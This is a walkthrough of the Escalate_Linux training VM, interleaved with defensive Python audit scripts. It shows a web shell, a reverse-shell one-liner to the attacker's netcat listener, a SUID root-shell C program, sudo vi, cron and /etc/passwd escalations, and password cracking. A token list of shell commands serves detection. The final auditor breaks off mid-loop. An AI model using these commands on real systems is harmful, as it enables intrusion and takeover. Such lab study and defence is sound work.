Escalate_Linux: 1 — Walkthrough
Escalate_Linux is a vulnerable virtual machine for learning Linux post-exploitation techniques; it contains 12+ methods of vertical, horizontal and multi-level privilege escalation. The target IP address is discovered by network scanning, and Nmap identifies the open ports and services. WhatWeb is then used for fingerprinting and Dirsearch to enumerate directories and files in order to gain initial access. After entering the target system, detailed enumeration is carried out manually and with automated tools such as LinPEAS to discover potential weaknesses. Escalation to root is achieved mainly through SUID/SGID files, NFS misconfiguration (such as no_root_squash), sudo command abuse, crontab task modification and tampering with system files. 2025-9-13 07:50:5 Author: infosecwriteups.com (view original)

Escalate_Linux — An intentionally developed Linux vulnerable virtual machine. The main focus of this machine is to learn Linux Post Exploitation (Privilege Escalation) techniques. “Escalate_Linux” is a Linux vulnerable virtual machine that contains different features, such as 12+ ways of Privilege Escalation, Vertical Privilege Escalation, Horizontal Privilege Escalation, and Multi-level Privilege Escalation.

Natsu

Initialize Access

Assume that both machines (attacker and escalate_linux_1) are on the same subnet. Use the netdiscover command to identify the target machine’s IP address.

sudo netdiscover -r 192.168.x.x/24 

Add an entry with the target IP address and hostname to the /etc/hosts file.

echo '192.1xx.xxx.xxx escalate.linux' | sudo tee -a /etc/hosts

Use Nmap to scan the target machine and identify open ports along with their corresponding services.

$ sudo nmap -A -T4 --disable-arp-ping -Pn --min-rate=2000 -oN result 192.1xx.xxx.xxx

Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-26 03:56 EDT
Nmap scan report for escalate.linux (192.xxx.xxx.xxx)
Host is up (0.00049s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 39895/tcp mountd
| 100005 1,2,3 41153/tcp6 mountd
| 100005 1,2,3 55700/udp mountd
| 100005 1,2,3 55968/udp6 mountd
| 100021 1,3,4 37367/tcp nlockmgr
| 100021 1,3,4 42315/tcp6 nlockmgr
| 100021 1,3,4 56016/udp nlockmgr
| 100021 1,3,4 58309/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs 3-4 (RPC #100003)
MAC Address: 00:0C:29:0C:21:64 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop
Service Info: Host: LINUX

Host script results:
| smb2-time:
| date: 2025-08-26T07:56:46
|_ start_date: N/A
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: LINUX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: osboxes
| NetBIOS computer name: LINUX\x00
| Domain name: \x00
| FQDN: osboxes
|_ System time: 2025-08-26T03:56:46-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)

TRACEROUTE
HOP RTT ADDRESS
1 0.49 ms escalate.linux (192.1xx.xx.xx)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds

Use whatweb to fingerprint the target and identify the technologies running on the web server.

Use dirsearch to enumerate directories and files on the target web server.

When you access the shell.php file, it displays a single line of text: pass cmd as parameter.

Pass id as the value of the cmd parameter.

After successfully executing a command through the web shell, run this command to start a reverse shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ip attacker> 4444 >/tmp/f

Use the Metasploit Framework to create a listener. You can also use other tools such as netcat or penelope.

use exploit/multi/handler
run lhost=eth0 lport=4444

Stabilize the shell using the command: python3 -c 'import pty;pty.spawn("/bin/bash")'

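The initial access above rides on a single cmd parameter to shell.php, which is also the easiest thing for a defender to spot in the web server's access log. The following is an added example, not code from the walkthrough: it parses Apache-style log lines, URL-decodes the query string and scores requests that pass shell-like content through a command parameter. The log lines are constructed to model the requests made in this section; the parameter names in SUSPICIOUS_PARAMS and the tokens in SHELL_TOKENS are assumptions for the demonstration, not a vendor signature.

```python
"""Spot command-execution web-shell requests in Apache access logs.

Added example (not the walkthrough's own code). The log lines are
constructed to model the shell.php?cmd=... requests made during initial
access; SUSPICIOUS_PARAMS and SHELL_TOKENS are assumptions.
"""
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Apache common/combined prefix: client, ident, user, [time], "request", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Query parameters commonly used by one-line PHP web shells (assumption).
SUSPICIOUS_PARAMS = {"cmd", "exec", "command", "c"}
# Fragments that raise the score when they appear in a decoded parameter value.
SHELL_TOKENS = ("mkfifo", "/bin/sh", "bash -i", "nc ", "|sh", "wget ", "curl ")


def parse_line(line: str) -> Dict:
    """Parse one access-log line into fields; query parameters are URL-decoded."""
    m = LOG_RE.match(line)
    if not m:
        return {}
    rec = m.groupdict()
    parts = urlsplit(rec["url"])
    rec["path"] = parts.path
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def detect_webshell(lines: List[str]) -> List[Dict]:
    """Return one hit per suspicious parameter value on a .php resource, scored by shell tokens."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if not rec or not rec["path"].endswith(".php"):
            continue
        for name, values in rec["params"].items():
            if name.lower() not in SUSPICIOUS_PARAMS:
                continue
            for value in values:
                score = 1 + sum(tok in value for tok in SHELL_TOKENS)
                hits.append({"ip": rec["ip"], "time": rec["time"], "path": rec["path"],
                             "param": name, "value": value, "score": score})
    return hits


# Constructed sample: one probe, one reverse-shell launch, one benign request.
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Aug/2025:03:58:01 -0400] "GET /shell.php?cmd=id HTTP/1.1" 200 54',
    '10.0.0.5 - - [26/Aug/2025:03:58:30 -0400] "GET /shell.php?cmd=rm%20/tmp/f%3Bmkfifo%20'
    '/tmp/f%3Bcat%20/tmp/f%7Csh%20-i%202%3E%261%7Cnc%2010.0.0.5%204444%20%3E/tmp/f HTTP/1.1" 200 0',
    '10.0.0.7 - - [26/Aug/2025:04:00:00 -0400] "GET /index.html HTTP/1.1" 200 10918',
]

if __name__ == "__main__":
    for hit in detect_webshell(SAMPLE_LOG):
        print(f"[score {hit['score']}] {hit['ip']} {hit['path']} {hit['param']}={hit['value']!r}")
```

The score is deliberately simple: a bare cmd=id is reported at score 1, while the named-pipe reverse shell from this section scores 4 because mkfifo, the pipe into sh and the nc call all appear in the decoded value. Feeding the real access log through detect_webshell is a one-line change (read the file into a list).
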
Manual Enumeration

  • The hostname command returns the hostname of the target machine. Although this value can easily be changed or be a relatively meaningless string (e.g., Ubuntu-1234567), in some cases it reveals the target system’s role within the corporate network (e.g., SQLSERV-PROD-01).
  • uname -a prints system information, giving additional detail about the kernel the system runs. This is useful when searching for potential kernel vulnerabilities that could lead to privilege escalation.
  • /proc/version: the proc filesystem (procfs) provides information about the target system’s processes. Looking at /proc/version may reveal the kernel version and additional data, such as whether a compiler (e.g., GCC) is installed.
  • /etc/issue: this file usually contains some information about the operating system but can easily be customized or changed.
  • The ps command is an effective way to see the running processes on a Linux system. ps -A shows all running processes, ps axjf shows the process tree, and ps aux shows processes for all users (a), the user that launched each process (u), and processes not attached to a terminal (x). Reading the ps aux output gives a better understanding of the system and potential vulnerabilities.
  • The env command shows environment variables.
  • The id command gives a general overview of the user’s privilege level and group memberships.
  • /etc/passwd lists the users on the system: cat /etc/passwd | cut -d ":" -f1. Note: this returns all users, including system or service accounts that are not very useful. Another approach is to grep for “home”, since real users will most likely have their folders under /home: cat /etc/passwd | grep home
  • Looking at earlier commands with the history command can give some idea about the target system and, albeit rarely, reveal stored information such as passwords or usernames.
  • The ifconfig command gives information about the network interfaces of the system; an additional interface may be a pivoting point into another network.
  • netstat
- `netstat -a`: shows all listening ports and established connections.
- `netstat -at` or `netstat -au`: lists only TCP or UDP sockets, respectively.
- `netstat -l`: lists ports in “listening” mode, i.e. open and ready to accept incoming connections. Combine with the t option (`netstat -lt`) to list only ports listening on TCP.
- `netstat -tp`: lists connections with the service name and PID information.
- `netstat -ano`: displays all sockets, does not resolve names, and displays timers.
  • find
- `find / -name perl*`, `find / -name python*`, `find / -name gcc*`: locate interpreters and compilers.
- `find / -size 50M`: find files of a given size.
- `find / -perm -u=s -type f -ls 2>/dev/null`: list SUID files, discarding permission errors.
- `find / -writable 2>/dev/null`: find files writable by the current user.
- `find / -mtime 10`, `find / -atime 10`: find files by modification or access time, in days.
- `find / -cmin 10`, `find / -amin 10`: find files by status-change or access time, in minutes.
- `find / -perm a=x`: find files executable by everyone.

Apply this knowledge to the challenge. From ps aux, MySQL is running as user mysql with PID 975.

In /etc/passwd, note that the mysql user has /bin/bash as its shell.

In /etc/mysql, the file secret.cnf is readable only by the mysql user. The directory also contains MySQL root credentials in mysql.cnf.

The MySQL credentials are user root and password root; use them to log in to the MySQL server.

mysql -uroot -p 

Switch to the mysql user using su and read the contents of secret.cnf. Attempting to log in with the root credential from secret.cnf fails.

The victim machine has users user1 to user8, so let’s try the combination <user>@12345 as each user’s password.

Automated Enumeration

Privilege Escalation: SUID & PATH

SUID (Set-user Identification) and SGID (Set-group Identification) allow files to be executed with the permission level of the file owner or the group owner, respectively.

Use the following command to list files that have the SUID or SGID bit set:

find / -perm -04000 -type f -ls 2>/dev/null

Most entries are default system files, but two files stand out:

  • /home/user5/script
  • /home/user3/shell

Both files are executables.

These files have the permission -rwsr-xr-x, which means they are executable by others. They are owned by root, and with the SUID bit set, they run with root privileges. Examine these files further.

When executing /home/user3/shell, the error sh: 1: ./.script.sh: not found appears. This binary is owned by root with the SUID and SGID bits set, and it calls system() to execute .script.sh from the current directory.

Contents of the .script.sh file:

echo "You Can't Find Me"
bash -i

The /home/user5/script binary is similar to the shell binary, but it calls system() to execute the ls command without an absolute path.

So we can use PATH hijacking to escalate privilege. PATH in Linux is an environment variable that tells the operating system where to search for executables. For any command that is not built into the shell and is not given with an absolute path, Linux searches the folders listed in PATH, in order.

echo $PATH
echo '/bin/bash' > /tmp/ls
chmod 777 /tmp/ls
export PATH=/tmp:$PATH

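Both findings in this section (root-owned SUID binaries sitting in home directories, and a binary that resolves ls through PATH) are easy to audit for, and a defender should check for them from a known baseline rather than wait for the find command above to be run by someone else. The following is an added example, not the walkthrough's own code: audit_setid reports set-id files outside the distribution's usual directories, audit_path flags PATH entries an unprivileged user can populate, and scan_filesystem gathers live records. SYSTEM_DIRS and the sample records are assumptions constructed for the demonstration.

```python
"""Audit SUID/SGID files and PATH for the hijack conditions above.

Added example (not the walkthrough's own code). SYSTEM_DIRS and the
sample records are assumptions constructed for the demonstration.
"""
import os
import stat
from dataclasses import dataclass
from typing import Iterable, List

# Where distribution-managed SUID/SGID binaries normally live (assumption).
SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/",
               "/usr/libexec/", "/usr/local/bin/", "/usr/local/sbin/")


@dataclass
class FileRecord:
    path: str
    mode: int   # st_mode as returned by os.lstat
    uid: int    # owner


def audit_setid(records: Iterable[FileRecord]) -> List[str]:
    """Report regular files with SUID/SGID set that live outside SYSTEM_DIRS."""
    findings = []
    for r in records:
        if not stat.S_ISREG(r.mode):
            continue
        bits = [name for flag, name in ((stat.S_ISUID, "SUID"), (stat.S_ISGID, "SGID"))
                if r.mode & flag]
        if bits and not r.path.startswith(SYSTEM_DIRS):
            owner = "root" if r.uid == 0 else f"uid {r.uid}"
            findings.append(f"{'/'.join(bits)} {r.path} owned by {owner} outside system dirs")
    return findings


def audit_path(path_value: str, writable_dirs: Iterable[str]) -> List[str]:
    """Flag PATH entries an attacker controls: empty or '.', relative, or a
    directory the current user can write to (the /tmp-prepended case above)."""
    writable = {d.rstrip("/") or "/" for d in writable_dirs}
    findings = []
    for entry in path_value.split(":"):
        if entry in ("", "."):
            findings.append(f"PATH contains current-directory entry {entry!r}")
        elif not entry.startswith("/"):
            findings.append(f"PATH contains relative entry {entry!r}")
        elif (entry.rstrip("/") or "/") in writable:
            findings.append(f"PATH contains writable directory {entry}")
    return findings


def scan_filesystem(root: str = "/") -> List[FileRecord]:
    """Collect set-id files from the live system, skipping pseudo-filesystems."""
    out = []
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.startswith(("/proc", "/sys", "/dev", "/run")):
            dirnames[:] = []          # do not descend further
            continue
        for name in filenames:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                out.append(FileRecord(p, st.st_mode, st.st_uid))
    return out


# Constructed records modelled on the find output described in this section.
SAMPLE_RECORDS = [
    FileRecord("/usr/bin/passwd", stat.S_IFREG | stat.S_ISUID | 0o755, 0),
    FileRecord("/home/user5/script", stat.S_IFREG | stat.S_ISUID | stat.S_ISGID | 0o755, 0),
    FileRecord("/home/user3/shell", stat.S_IFREG | stat.S_ISUID | stat.S_ISGID | 0o755, 0),
    FileRecord("/home/user1/notes.txt", stat.S_IFREG | 0o644, 1001),
]

if __name__ == "__main__":
    # Live use: audit_setid(scan_filesystem()); the writable-dir list would come from find / -writable.
    for f in audit_setid(SAMPLE_RECORDS) + audit_path(os.environ.get("PATH", ""), ["/tmp"]):
        print(f)
```

The fix on the binary side is to call system() with an absolute path (or, better, not to shell out from a set-id program at all); on the host side, mounting /tmp and /home with nosuid removes the planted-binary variant, and comparing audit_setid output against a stored baseline catches new set-id files as they appear.
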
Privilege Escalation: NFS

NFS (Network File System) configuration is stored in /etc/exports. This file is created during NFS server installation and is usually world-readable. On the victim machine, check this file:

Refer back to the Nmap output. It shows that the NFS service is running on the target. Enumerate mountable shares from the Kali machine:

The key element of this privilege escalation vector is the no_root_squash option in /etc/exports. If this option is set on a writable share, an attacker can create an executable with the SUID bit set and execute it on the target system.

Mount the share to a local directory:

sudo mkdir /mnt/share
sudo mount -t nfs escalate.linux:/home/user5 /mnt/share

Create a C program that executes /bin/sh with root privileges.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    setuid(0);           /* effective root because the file is SUID root on the share */
    setgid(0);
    system("/bin/sh");   /* the spawned shell inherits uid/gid 0 */
    return 0;
}

gcc -o main main.c

Copy the compiled file to the writable share.

On the victim machine, execute this file to gain a root shell.

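Everything in this section hinges on one option in /etc/exports, so the check a defender wants is a parser that reads the file and reports no_root_squash on writable exports (plus a corrected line to drop in). The following is an added example, not the walkthrough's own code. It handles the exports(5) form path client(opt,opt) client2(opt); the sample text is constructed to match the share described above, since the walkthrough shows the real file only as a screenshot.

```python
"""Parse /etc/exports and flag the no_root_squash weakness.

Added example (not the walkthrough's own code). SAMPLE_EXPORTS is
constructed to match the share described in this section.
"""
from dataclasses import dataclass, field
from typing import Dict, List


@dataclass
class Export:
    path: str
    clients: Dict[str, List[str]] = field(default_factory=dict)  # client -> options


def _split_client(token: str):
    """'*(rw,no_root_squash)' -> ('*', ['rw', 'no_root_squash']); a bare host has no options."""
    if token.endswith(")") and "(" in token:
        client, opts = token[:-1].split("(", 1)
        return (client or "*"), [o for o in opts.split(",") if o]
    return token, []


def parse_exports(text: str) -> List[Export]:
    """Parse exports(5) lines; comments and blanks are skipped, and a path
    with no client list is exported to the world ('*')."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        exp = Export(parts[0])
        tokens = parts[1].split() if len(parts) > 1 else []
        if not tokens:
            exp.clients["*"] = []
        for tok in tokens:
            client, opts = _split_client(tok)
            exp.clients[client] = opts
        exports.append(exp)
    return exports


def audit_exports(exports: List[Export]) -> List[str]:
    """One finding per risky (path, client) pair."""
    findings = []
    for e in exports:
        for client, opts in e.clients.items():
            world = client == "*" or client.startswith("*.")
            if "no_root_squash" in opts:
                sev = "HIGH" if "rw" in opts else "MEDIUM"
                findings.append(f"{sev} {e.path} -> {client}: no_root_squash "
                                f"(client root can plant root-owned SUID files)")
            if world and "rw" in opts:
                findings.append(f"MEDIUM {e.path} -> {client}: writable export to any client")
            if "insecure" in opts:
                findings.append(f"LOW {e.path} -> {client}: insecure (non-privileged source ports)")
    return findings


def render_fixed(e: Export) -> str:
    """Rewrite an export line with no_root_squash replaced by root_squash."""
    cols = []
    for client, opts in e.clients.items():
        fixed = ["root_squash" if o == "no_root_squash" else o for o in opts]
        cols.append(f"{client}({','.join(fixed)})" if fixed else client)
    return f"{e.path} {' '.join(cols)}"


# Constructed sample modelled on the VM's export plus one sane read-only share.
SAMPLE_EXPORTS = """# constructed sample
/home/user5 *(rw,sync,no_root_squash)
/srv/public 10.0.0.0/24(ro,sync)
"""

if __name__ == "__main__":
    exports = parse_exports(SAMPLE_EXPORTS)      # live use: parse_exports(open("/etc/exports").read())
    for finding in audit_exports(exports):
        print(finding)
    for e in exports:
        print("fixed:", render_fixed(e))
```

root_squash is the exportfs default, so the corrected line simply restores it; restricting the client list to a subnet and mounting shares with nosuid on clients removes the remaining writable-to-anyone and planted-SUID concerns that this section relies on.
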
Privilege Escalation: Sudo

The sudo command, by default, allows you to run a program with root privileges. Under some conditions, system administrators may need to give regular users some flexibility on their privileges.

As shown in the /etc/passwd file above, user7 belongs to the root group. We can use this user to read the /etc/sudoers file and determine which users are allowed to run sudo commands.

Users user1, user2, and user8 have sudo privileges.

Let’s start with user1 (password user1@12345).

user1 can run any command with sudo as root or as any other user.

Switch to user2 (password user2@12345). user2 can run any command with sudo as user1, who in turn can run any command with sudo as root.

For user8 (password user8@12345), sudo allows running /usr/bin/vi with root privileges. Refer to GTFOBins for instructions on escalating to root via vi.

sudo /usr/bin/vi -c ':!/bin/sh' /dev/null

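The interesting part of this section is the multi-level hop: no rule gives user2 root, yet user2 reaches root through user1, and user8's single vi entry is as good as ALL because the editor can spawn a shell. A review of sudoers therefore has to follow runas chains, not just look for (ALL) ALL. The following is an added example, not the walkthrough's own code: it parses the common user HOST=(RUNAS) [NOPASSWD:] cmd, cmd form and reports the path each user has to root. The sample rules are constructed from the description above (the real file is shown only as a screenshot), and SHELL_ESCAPES is a short assumed subset of the GTFOBins sudo entries, not the full list.

```python
"""Trace multi-hop sudo paths to root from sudoers-style rules.

Added example (not the walkthrough's own code). SAMPLE_SUDOERS is
constructed from the description above; SHELL_ESCAPES is an assumed
subset of GTFOBins' sudo entries.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set


@dataclass
class Rule:
    user: str
    runas: List[str]
    nopasswd: bool
    commands: List[str]


_RULE = re.compile(r"^(\S+)\s+[^\s=]+\s*=\s*(?:\(([^)]*)\))?\s*(.*)$")
# Binaries whose sudo entry on GTFOBins includes a shell escape (assumed subset).
SHELL_ESCAPES = {"/usr/bin/vi", "/usr/bin/vim", "/usr/bin/less", "/usr/bin/more",
                 "/usr/bin/find", "/usr/bin/awk", "/usr/bin/nano", "/bin/bash", "/bin/sh"}


def parse_rules(text: str) -> List[Rule]:
    """Parse user specifications; Defaults, aliases, %group rules and includes are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "@", "%")) or "_Alias" in line:
            continue
        m = _RULE.match(line)
        if not m:
            continue
        user, runas_spec, cmd_spec = m.groups()
        runas_users = (runas_spec or "root").split(":")[0]      # drop the :GROUP part
        runas = [u.strip() for u in runas_users.split(",") if u.strip()] or ["root"]
        nopasswd, commands = False, []
        for cmd in cmd_spec.split(","):
            cmd = cmd.strip()
            for tag in ("NOPASSWD:", "PASSWD:"):
                if cmd.upper().startswith(tag):
                    nopasswd = nopasswd or tag == "NOPASSWD:"
                    cmd = cmd[len(tag):].strip()
            if cmd:
                commands.append(cmd)
        rules.append(Rule(user, runas, nopasswd, commands))
    return rules


def _grants_shell(rule: Rule) -> bool:
    """ALL, or any command known to escape to a shell, is treated as a full hop."""
    return "ALL" in rule.commands or any(c.split()[0] in SHELL_ESCAPES for c in rule.commands)


def path_to(rules: List[Rule], user: str, target: str = "root",
            _seen: Optional[Set[str]] = None) -> List[str]:
    """Chain of users by which `user` reaches `target` through sudo, or [] if none."""
    seen = _seen if _seen is not None else set()
    if user in seen:
        return []
    seen.add(user)
    for r in rules:
        if r.user != user or not _grants_shell(r):
            continue
        for ra in r.runas:
            if ra in ("ALL", target):
                return [user, target]
            chain = path_to(rules, ra, target, seen)
            if chain:
                return [user] + chain
    return []


def report(rules: List[Rule]) -> Dict[str, List[str]]:
    """Every user in the rules that can reach root, with the path found."""
    return {u: p for u in sorted({r.user for r in rules}) if (p := path_to(rules, u))}


# Constructed to match the three sudo grants described in this section, plus one harmless rule.
SAMPLE_SUDOERS = """# constructed sample
Defaults env_reset
user1 ALL=(ALL:ALL) ALL
user2 ALL=(user1) ALL
user8 ALL=(root) /usr/bin/vi
user3 ALL=(root) NOPASSWD: /bin/ls
"""

if __name__ == "__main__":
    for user, chain in report(parse_rules(SAMPLE_SUDOERS)).items():
        print(f"{user}: {' -> '.join(chain)}")
```

The output reads user1 -> root, user2 -> user1 -> root and user8 -> root, while user3's ls grant produces nothing. A rule that allows an editor or pager as root should be replaced with sudoedit or a wrapper that cannot escape, and runas grants to other users deserve the same scrutiny as direct root grants.
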
Privilege Escalation: Cron Jobs

Cron jobs are used to run scripts or binaries at specific times. By default, they run with the privileges of their owners and not the current user. While properly configured cron jobs are not inherently vulnerable, they can provide a privilege escalation vector under some conditions.

The idea is quite simple: if there is a scheduled task that runs with root privileges and we can change the script it runs, then our script will run with root privileges.

Any user can read the file that holds system-wide cron jobs, /etc/crontab.

In the crontab, note the entry that runs /home/user4/Desktop/autoscript.sh every 5 minutes.

Modify autoscript.sh to include a custom payload.

On our Kali machine, a reverse shell connects back.

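The condition that makes this job exploitable is not the schedule but the ownership: a root job executes a script that a regular user (and the user's directory tree) controls. The following is an added example, not the walkthrough's own code. It parses the system crontab format (five time fields or an @ keyword, then user and command), and for each root job walks the program path upward, reporting any component owned by or writable for a non-root principal. The crontab text and the permission table are constructed to mirror the autoscript.sh entry above; live_lookup swaps the table for real os.stat calls.

```python
"""Find root cron jobs whose program a non-root user can change.

Added example (not the walkthrough's own code). SAMPLE_CRONTAB and
SAMPLE_PERMS are constructed to mirror the entry described above.
"""
import os
import stat
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional


@dataclass
class CronJob:
    schedule: str
    user: str
    command: str
    program: str     # first word of the command


@dataclass
class Perm:
    mode: int
    uid: int
    gid: int


def parse_system_crontab(text: str) -> List[CronJob]:
    """Parse /etc/crontab or /etc/cron.d entries; SHELL=/PATH= lines and comments are skipped."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        n_sched = 1 if line.startswith("@") else 5           # @reboot, @daily ... vs five fields
        fields = line.split(None, n_sched + 1)
        if len(fields) < n_sched + 2:
            continue
        schedule, user, command = " ".join(fields[:n_sched]), fields[n_sched], fields[n_sched + 1]
        jobs.append(CronJob(schedule, user, command, command.split()[0]))
    return jobs


def weak_links(program: str, lookup: Callable[[str], Optional[Perm]]) -> List[str]:
    """Reasons a non-root user could control `program`, checking it and every parent directory."""
    reasons, path = [], program
    while True:
        p = lookup(path)
        if p is None:
            reasons.append(f"{path}: missing (whoever can create it owns the job)")
        else:
            if p.uid != 0:
                reasons.append(f"{path}: owned by uid {p.uid}")
            if p.mode & stat.S_IWGRP and p.gid != 0:
                reasons.append(f"{path}: writable by gid {p.gid}")
            if p.mode & stat.S_IWOTH:
                reasons.append(f"{path}: world-writable")
        parent = os.path.dirname(path)
        if parent == path:
            return reasons
        path = parent


def audit_cron(jobs: List[CronJob], lookup: Callable[[str], Optional[Perm]]) -> List[str]:
    """Findings for jobs that run as root."""
    findings = []
    for j in jobs:
        if j.user != "root":
            continue
        if not j.program.startswith("/"):
            findings.append(f"root job '{j.command}': program resolved via cron PATH, not absolute")
            continue
        findings.extend(f"root job '{j.command}' ({j.schedule}): {r}" for r in weak_links(j.program, lookup))
    return findings


def live_lookup(path: str) -> Optional[Perm]:
    """Permission lookup against the real filesystem (use as: audit_cron(jobs, live_lookup))."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return Perm(st.st_mode, st.st_uid, st.st_gid)


# Constructed sample: one distribution job and the user-owned script from this section.
SAMPLE_CRONTAB = """SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root /usr/bin/run-parts /etc/cron.hourly
*/5 * * * * root /home/user4/Desktop/autoscript.sh
"""
D, F = stat.S_IFDIR, stat.S_IFREG
SAMPLE_PERMS: Dict[str, Perm] = {
    "/": Perm(D | 0o755, 0, 0), "/usr": Perm(D | 0o755, 0, 0), "/usr/bin": Perm(D | 0o755, 0, 0),
    "/usr/bin/run-parts": Perm(F | 0o755, 0, 0), "/home": Perm(D | 0o755, 0, 0),
    "/home/user4": Perm(D | 0o755, 1004, 1004), "/home/user4/Desktop": Perm(D | 0o755, 1004, 1004),
    "/home/user4/Desktop/autoscript.sh": Perm(F | 0o755, 1004, 1004),
}

if __name__ == "__main__":
    for f in audit_cron(parse_system_crontab(SAMPLE_CRONTAB), SAMPLE_PERMS.get):
        print(f)
```

Three findings come out for the autoscript.sh job (the script, its Desktop directory and the user4 home are all owned by uid 1004), and none for run-parts. The remedy is to keep root-run scripts under a root-owned path such as /usr/local/sbin with mode 0755, or to run the job as the user who owns the script.
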
Privilege Escalation: Abuse /etc/passwd to Add Super User or Modify Root’s Password

user7 belongs to the root group. This can be leveraged to modify /etc/passwd.

Copy the /etc/passwd file from the victim machine to the Kali machine and generate a password hash for the new account:

openssl passwd -1 -salt xyz user9@12345

user9:$1$xyz$t03y2O3ybmP8UNUoFQEQl/:0:0:root:/root:/bin/bash

Replace the original /etc/passwd file with the modified version that includes the new user user9.

Switch to user9 with password user9@12345.

Checking group permissions shows that user4 and user7 belong to the root group. This allows user4 to modify /etc/passwd as well.

user4 has primary group user4 and supplementary group root.

On the Kali machine:

Download passwdmod from the attacker machine and replace the original /etc/passwd file with the modified version.

Switch to root with password root@12345.

Privilege Escalation: Crack root’s password (weak password)

As shown earlier, user1, user2, and user8 are listed in the sudoers file, which grants them root privileges through sudo. Any of these accounts can be used to read /etc/shadow.

Copy the original /etc/passwd and /etc/shadow files to our Kali machine.

Use John to crack the root password and retrieve the plaintext.

Log in as root using the credentials root:12345.

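The last two sections leave fingerprints that are simple to check for: a second UID-0 line, a hash sitting directly in the world-readable /etc/passwd instead of an x, root-group membership for ordinary users, a service account such as mysql with /bin/bash as its shell, and an md5crypt ($1$) or otherwise weak hash in /etc/shadow. The following is an added example, not the walkthrough's own code, that runs those checks over the three files; the sample files are constructed (the user9 line reuses the hash shown above, while the shadow hashes are labelled placeholders, not real credentials), and the uid boundary and shell list are Debian/Ubuntu conventions assumed for the demonstration.

```python
"""Integrity checks on /etc/passwd, /etc/group and /etc/shadow.

Added example (not the walkthrough's own code). The sample files are
constructed; SYSTEM_UID_MAX and NOLOGIN_SHELLS are Debian/Ubuntu
conventions assumed for the demonstration.
"""
from typing import List

SYSTEM_UID_MAX = 999          # human accounts start at 1000 on Debian/Ubuntu (assumption)
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}
STRONG_HASH_PREFIXES = ("$2", "$5$", "$6$", "$7$", "$y$")   # bcrypt, sha256/512crypt, scrypt, yescrypt


def parse_colon_file(text: str) -> List[List[str]]:
    """Split a passwd/group/shadow style file into field lists, ignoring blanks and comments."""
    return [line.split(":") for line in text.splitlines() if line.strip() and not line.startswith("#")]


def audit_passwd(passwd_text: str, group_text: str = "", shadow_text: str = "") -> List[str]:
    """Return one finding per suspicious condition across the three files."""
    findings = []
    for f in parse_colon_file(passwd_text):
        if len(f) != 7:
            findings.append(f"passwd: malformed entry {f[0]!r}")
            continue
        name, pw, uid, gid, _gecos, _home, shell = f
        if not (uid.isdigit() and gid.isdigit()):
            findings.append(f"passwd: non-numeric uid/gid for {name}")
            continue
        uid_n, gid_n = int(uid), int(gid)
        if uid_n == 0 and name != "root":
            findings.append(f"passwd: extra UID-0 account {name}")
        if gid_n == 0 and name != "root":
            findings.append(f"passwd: {name} has primary group root")
        if pw == "":
            findings.append(f"passwd: {name} has an empty password field")
        elif pw not in ("x", "*", "!", "!!"):
            findings.append(f"passwd: {name} carries a password hash in the world-readable passwd file")
        if 0 < uid_n <= SYSTEM_UID_MAX and shell not in NOLOGIN_SHELLS:
            findings.append(f"passwd: service account {name} (uid {uid_n}) has interactive shell {shell}")
    for g in parse_colon_file(group_text):
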